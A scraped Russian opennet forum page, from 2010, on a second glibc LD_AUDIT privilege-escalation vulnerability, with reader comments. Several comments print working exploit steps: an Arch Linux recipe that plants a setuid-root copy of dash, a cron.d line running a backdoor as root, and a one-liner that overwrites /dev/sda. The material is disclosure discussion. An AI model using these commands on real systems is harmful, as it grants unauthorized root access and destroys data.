https://www.opennet.dev/openforum/vsluhforumID3/71714.html Спустя несколько дней после обнаружения в системной библиотеке GNU C Library (glibc) уязвимости (http://www.opennet.ru/opennews/art.shtml?num=28338), сообщается (http://seclists.org/fulldisclosure/2010/Oct/344) о нахождении еще одного метода взлома, позволяющего выполнить код с привилегиями суперпользователя. В отличие от ранее представленной техники, новый метод эксплуатации проявляется не только в RHEL, Fedora и CentOS, но и в Debian/Ubuntu и других Linux-дистрибутивах, использующих glibc 2.4 или более позднюю версию. Отдельно собщается (http://www.openwall.com/lists/announce/2010/10/22/1), что проблеме не подвержена glibc из состава OpenWall (http://www.openwall.com/) и ALT Linux, так как в данных дистрибутивах изначально по умолчанию использован повышающий безопасность патч "sanitize-env".<br><br><br>По своей сути новая уязвимость основана на том же принципе и базируется на отсутствии должных проверок при динамическом связывании в режиме LD_AUDIT библиотек с исполняемыми файлами, для кото...<br><br>URL: http://seclist https://www.opennet.dev/openforum/vsluhforumID3/71714.html#106 Wed, 27 Oct 2010 10:59:25 GMT в генте в нестабильном профиле приехал glibc-2.12.1-r2 сегодня<br>дыра закрыта<br> https://www.opennet.dev/openforum/vsluhforumID3/71714.html#105 Tue, 26 Oct 2010 18:49:39 GMT &gt; интересно, а куда еще можно<br>&gt; чего засунуть, чтобы получить рута?<br><br>apache+mpm_itk<br> https://www.opennet.dev/openforum/vsluhforumID3/71714.html#103 Mon, 25 Oct 2010 16:47:35 GMT Создали файл в /etc/cron.d<br><br>Потом благодаря аттрибутам 666, записали такое в него<br><br>* * * * * root /tmp/mybackdoor.bin &gt; /dev/null<br><br>И через минуту бекдор от рута висит в памяти.<br><br>достаточно хилый?<br> https://www.opennet.dev/openforum/vsluhforumID3/71714.html#102 Mon, 25 Oct 2010 16:16:12 GMT если не получается с помощью cron то есть другие методы, например ниже изложен метод получения прав root для Arch Linux. А вообще суть этой уязвимости в том, что можно создать файлы с правами на запись в них для обычного пользователя, в тех каталогах в которых это делать запрещено. <br> <br>на Arch Linux я получил консоль с правами root(запустив после рестарта системы из консоли обычного пользователя команду /usr/bin/sdash) использовав эти указания из аналогичной темы на LOR:<br><br>especially for ArchLinux users:<br><br>umask 0<br>LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/rc.d/functions.d/exploit" ping<br>echo -e '#!/bin/bash\ncp /bin/dash /usr/bin/sdash\nchmod u+s /usr/bin/sdash' &gt; /etc/rc.d/functions.d/exploit<br>sudo reboot<br><br>/usr/bin/sdash -c 'whoami'<br>/usr/bin/sdash -c 'rm -f /usr/bin/sdash /etc/rc.d/functions.d/exploit'<br> https://www.opennet.dev/openforum/vsluhforumID3/71714.html#101 Mon, 25 Oct 2010 09:12:57 GMT тут ошибка не конкретная, а системная. и этот и предыдущий баг нужно фиксить во избежание. игры с огнем никому не нужны<br> https://www.opennet.dev/openforum/vsluhforumID3/71714.html#100 Mon, 25 Oct 2010 05:47:31 GMT &gt;не стоит пакета glibc-utils-&gt; нет libpcprofile.so -&gt; не работает уязвимость -&gt; happy happy<br><br>Во-первых, не во всех дистрах glibc и glibc-utils разделены.<br>Во-вторых, libpcprofile.so &#8212; не единственная библиотека, которую можно использовать.<br> https://www.opennet.dev/openforum/vsluhforumID3/71714.html#99 Mon, 25 Oct 2010 05:12:16 GMT sys-libs/glibc-2.11.2 не работает <br>Oct 25 09:18:01 cron[3032]: (*system*) BAD FILE MODE (/etc/cron.d/exploit)<br>ну и что, что файл создался толку то...<br> https://www.opennet.dev/openforum/vsluhforumID3/71714.html#98 Mon, 25 Oct 2010 04:34:17 GMT для особо одаренных пожалуй надо повторить:<br>не стоит пакета glibc-utils-&gt; нет libpcprofile.so -&gt; не работает уязвимость -&gt; happy happy<br> https://www.opennet.dev/openforum/vsluhforumID3/71714.html#97 Mon, 25 Oct 2010 04:31:27 GMT Тут на лоре такой вариант предложили для особо упорствующих: <br>umask 0 ; LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/dev/sda" ping<br>